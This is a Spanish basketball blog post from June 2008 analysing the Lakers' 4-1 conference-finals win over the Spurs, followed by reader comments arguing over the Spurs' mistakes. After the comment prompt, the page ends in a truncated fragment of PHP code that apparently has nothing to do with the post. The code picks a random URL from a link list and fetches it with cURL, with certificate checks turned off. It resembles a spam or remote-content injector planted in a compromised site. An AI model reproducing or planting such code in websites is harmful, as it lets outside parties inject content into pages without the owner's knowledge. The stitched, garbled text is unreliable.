ANÁLISIS LAKERS 4 – SPURS 1

03 de June de 2008 por TheDeerHunter

Ya barruntaba dificultades Greg Popovic en los albores del mes de Febrero, cuando se quejó amargamente del traspaso que llevó a Pau Gasol a los Lakers. Unas declaraciones que abogaban incluso por vetos y comisiones supervisoras para evitar este tipo de operaciones injustas para todos excepto para los que tienen la suerte de poder llevarlas a cabo. Si la revolución había empezado con la construcción del Big Three de Boston a principio de temporada, cuando llegó febrero la convulsión se convirtió en auténtica locura y si me apuras en caos. En este punto, mientras varios candidatos ponían sus plantillas patas arriba temblando ante el temible panorama que se les avecinaba, los Spurs supieron mantener la calma, moviendo sus piezas cautelosamente, conscientes que, a pesar de todo, los campeones eran ellos y lo seguirían siendo mientras no se demostrara lo contrario.

Estas finales de conferencia, han escenificado más que nunca, la batalla entre el antes y el ahora, generado por la temporada más intensa de la historia en cuanto a movimientos de jugadores se refiere. Las grandes potencias de los últimos años contra los proyectos emergentes, diseñados milimétricamente en la intimidad de lujosos despachos situados en los más altos rascacielos, bien alejados del bullicio de los aficionados. En esta serie en concreto, los verdaderos favoritos al principio de temporada y de siempre contra el proyecto revelación de la misma, por el que nadie daba un duro al principio y que luego transformaron súbitamente. Máximos favoritos a priori de haber podido contar con Andrew Bynum.

¿Se puede decir que han sido éstos los que han prevalecido? Los resultados así lo indican… pero más allá de ellos, si nos paramos a pensar un poco más profundamente en todo lo que ha sucedido, deberíamos darnos cuenta de lo circunstancial y efímero de tal conclusión, porque ni de lejos el 4-1 puede reflejar lo que se ha visto en la cancha y la igualdad entre estos dos grandes equipos. De hecho, visto de lo visto a nadie le hubiera debido extrañar un 1-4 en la otra dirección aunque esto no sea nada más que divagar.

Las claves de la eliminatoria, en nuestra opinión, han podido ser:

1) El tremendo desgaste del Wild Wild West. Primer error de San Antonio. En los últimos años se han acostumbrado a poner la “máxima potencia” cuanto más tarde mejor. Es una estrategia habitual, sobre todo en los equipos con alta experiencia en playoffs y con títulos. Sin embargo, este año ha sido un error porque los rivales eran terribles en su parte del cuadro. Las consecuencias en esta serie han sido muy visibles. Se les ha podido ver muy cascados mentalmente y físicamente, desperdiciando ventajas increíbles en el primer y quinto partido, con muchas dudas en el cuarto y, sobre todo, con el peor Manu Ginobili de su carrera en la NBA casualmente por estos precisos motivos.

2) Kobe Bryant. Definitivo, sin más. La defensa sobre él ha sido casi ridícula. No podemos saber si lo de Bruce Bowen ha sido también producto del desgaste, suponemos que en cierto modo sí. No obstante ya sonaron algunas voces criticando su inclusión este año en el quinteto defensivo. Si haciendo la cantidad de faltas que hace, prácticamente en cada jugada, con apenas unas pocas sancionadas y Kobe metiendo casi 30 puntos por partido en una de cada dos, dónde podríamos haber incluído a Kirilenko que lo defendió muchísimo mejor y limpiamente. En cualquier caso el 24 Laker ha demostrado estar en el mejor momento de su carrera y ahora mismo es tan indefendible como lo han podido ser los más grandes de este deporte. Y no olvidemos que arrastra una lumbalgia y un dedo roto… alucinante.

3) Gasol sobre Tim Duncan. El mejor “cuatro” de la historia es también indefendible y más todavía por un par de las características de Gasol. Por ahí es por donde Popovic trató de llevarse una eliminatoria sin Ginobili. La sangría ha sido terrible, pero lo del español ha tenido muchísimo mérito. Ha necesitado reinventarse a si mismo, en el peor momento del mundo, en las peores condiciones físicas, contra el peor rival posible, en un juego que no es el suyo y sin relevo de ningún tipo, con todos los focos apuntándole. Vosotros diréis si ha rehuído su responsabilidad. Hoy Gasol ya no es tan blando… y Duncan lo sabe y lo recordará con amargura.

4) La intendencia. Segundo error de Popovic (y ya es raro). Todo ha girado en torno a sus tres hombres de confianza… excepto que uno de ellos no podía dar más de si. ¿Cuál es el motivo, entonces, por el que ha habido jugadores que apenas han contado pero cuando han salido lo han hecho bien? El caso más sangrante el de Brent Barry, exquisito en todo lo que ha hecho. Otros nombres como Michael Finley, Ime Udoka o Kurt Thomas han perdido muchos minutos con respecto a jugadores como Robert Horry, Jacque Vaughn… o los mismísmos Oberto, Ginobili o incluso Bruce Bowen que no han estado nada bien. ¿Para qué has fichado a Stoudamire? ¿Tan mal estaba como para no contar absolutamente nada? ¿Es tan descabellado dejar descansar más a Ginobili por si se recupera para el siguiente partido? De hecho los números del crack argentino mejoraban ostensiblemente si podía descansar dos días seguidos. La intendencia de L.A. ha ganado la batalla ampliamente a la de Spurs: Odom algo irregular, Fisher con la lengua fuera (y lesionado) pero increíble Vujacic, bien Walton, recuperados Radmanovic y Farmar… Sólo faltaba que Turiaf estuviera más acertado y que Ariza pudiera aportar algo en la final…

A pesar de todo, San Antonio ha mostrado su casta de campeón y ha peleado, con todas las dificultades que arrastraba, hasta el último minuto del último partido. Muchos piensan que esta ha sido la final anticipada… Digna de ella seguro que ha sido. El proyecto de San Antonio no está ni mucho menos agotado. Sigue vigente, aunque cada día será más difícil por el potencial de sus rivales en el Oeste. Sería aconsejable dar un poco de aire a este equipo, rejuvenenciende alguna de sus posiciones y, si puede ser, dándole más ayuda a Duncan en el juego interior. No obstante, con algún que otro mínimo retoque el año que viene volverán a darnos guerra… al fin y al cabo toca año impar.

Comenta

8 comentarios a esta entrada

  1. Red dice:
    #1

    Muy acertado el párrafo de Gasol, la definición más bien hecha de todas las que he visto…
    (dejanod aparte a Trecet, otro universo…)

    Grande Deer!

    “Ha necesitado reinventarse a si mismo, en el peor momento del mundo, en las peores condiciones físicas, contra el peor rival posible, en un juego que no es el suyo y sin relevo de ningún tipo, con todos los focos apuntándolo…”

    Grande!

      Citar

  2. MagicJohnson32 dice:
    #2

    No sé hasta qué punto se puede hablar de errores de los Spurs. Ya lo dije antes de empezar la eliminatoria: tenemos mejor equipo y mejor entrenador. Y, por supuesto, al mejor jugador. No voy a decir al mejor jugador de la liga o del mundo, porque podríamos discutir mucho. Pero Kobe es el mejor jugador de esta temporada, y en los Playoffs no ha hecho más que aumentar más la diferencia respecto a los competidores.

    Quiero decir, que la victoria de los Lakers es una consecuencia lógica de las circunstancias.

      Citar

  3. TheDeerHunter dice:
    #3

    Cuando hablaba de errores lo hacía en referencia a dos aspectos muy concretos, no al resultado de la eliminatoria ni a las circunstancias generales de la serie.
    Para mí son errores evidentes… obviamente a toro pasado, que son mucho más fáciles de determinar. Si el resultado hubiera sido otro no podríamos hablar ahora mismo de errores.

    ¿o acaso crees que San Antonio hizo el tramo final de temporada regular al mismo nivel de autoexigencia que cuando empezaron a jugarse las castañas de verdad?? ¿es lo mismo haberse partido la cara contra Suns y contra Hornets a 7 con factor cancha en contra que prácticamente sólo haber competido contra Utah como le ha ocurrido en Lakers?? ¿no es más peligroso todavía ese cuadro con una plantilla veterana como la suya??
    Y, ¿no opinas igual que yo que ciertos jugadores jugaron poco en relación a otros? ¿no debería haber descansado algo más Ginobili, teniendo en cuenta que Barry y Finley lo estaban haciendo bien??

    Esas son las dos cuestiones que conviene responder para saber si hay que hablar o no de errores.

      Citar

  4. MagicJohnson32 dice:
    #4

    Mira, he recordado algo que escribí tras la victoria de Lakers sobre Spurs en el penúltimo partido de regular season:

    “””Las lecturas que se han de hacer de la victoria angelina y la derrota texana no han de ir, ni mucho menos, más allá de un partido importante de regular season. Sin embargo, las señales que emitieron uno y otro equipo fueron bien diferentes y, a escasos días del inicio de los Playoffs, los Spurs han de preocuparse por las últimas tduncantparkerbenchderrotas cosechadas ante Jazz, Suns y Lakers, en las que apenas han anotado 76 puntos por partido y han perdido por una diferencia media de más de 21 puntos.

    Por supuesto, a nadie le extrañaría que, con el regreso de Ginóbili y la llegada de los Playoffs, San Antonio volviese a ofrecer la imagen de equipo rocoso, casi indestructible. Pero en un partido tan importante como el de anoche, en el que se jugaban ser primeros de Conferencia y tener ventaja de campo en todas las eliminatorias del Oeste, el equipo dio una imagen gris y de falta de hambre. Todo lo contrario que su rival, unos Lakers que, tras 3 años sin acceder a la segunda ronda de Playoffs, celebraron un triunfo que les deja a un paso de encabezar el Oeste al término de los 82 encuentros de regular season.”””

    Creo que la lectura de este partido es válida para la eliminatoria, sólo que ahora los Spurs no tiene la excusa de las bajas.

      Citar

  5. TheDeerHunter dice:
    #5

    En efecto, cuando lo escribiste estaba completamente de acuerdo contigo.

    Lo sigo estando. El exceso de confianza de que en playoffs iban a poder con todo ha sido su primer error. Me estás dando la razón implícitamente Magic…

      Citar

  6. MagicJohnson32 dice:
    #6

    No, no, no. No te doy la razón ni implícita ni explícitamente, no te apuntes tantos, jaja :p)

    Lo que digo es que no es cosa de un error o un exceso de confianza. Como dije tras aquel partido de regular season, el equipo daba imagen de falta de hambre. Y vale que era regular season pero era el partido más importante de toda la regular, con el liderato del Oeste en juego. Así que había dos opciones: que realmente les importase poco ser primeros, o bien que el equipo no diese para más, que no existiese una “quinta marcha” por meter.

    Y mi impresión es ésa. Que no han dado para más (ojo, unas finales de conferencia).

      Citar

  7. TheDeerHunter dice:
    #7

    Pero es que tu planteamiento falla en un punto.
    Sí han tenido una quinta marcha por meter y lo han demostrado contra Phoenix y contra Hornets, en relación a su juego del final de temporada regular… pero el factor que finalmente les ha fastidiado ha sido el desgaste (lo digo fundamentalmente por Ginobili) que les ha provocado esos intensos duelos.

    Por otro lado, en otras temporadas ya habíamos conocido la “falta de hambre” que comentas en temporada regular aunque luego sí habían logrado rebertirlo sin demasiados problemas.

      Citar

  8. TheDeerHunter dice:
    #8

    mierda de b-v

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>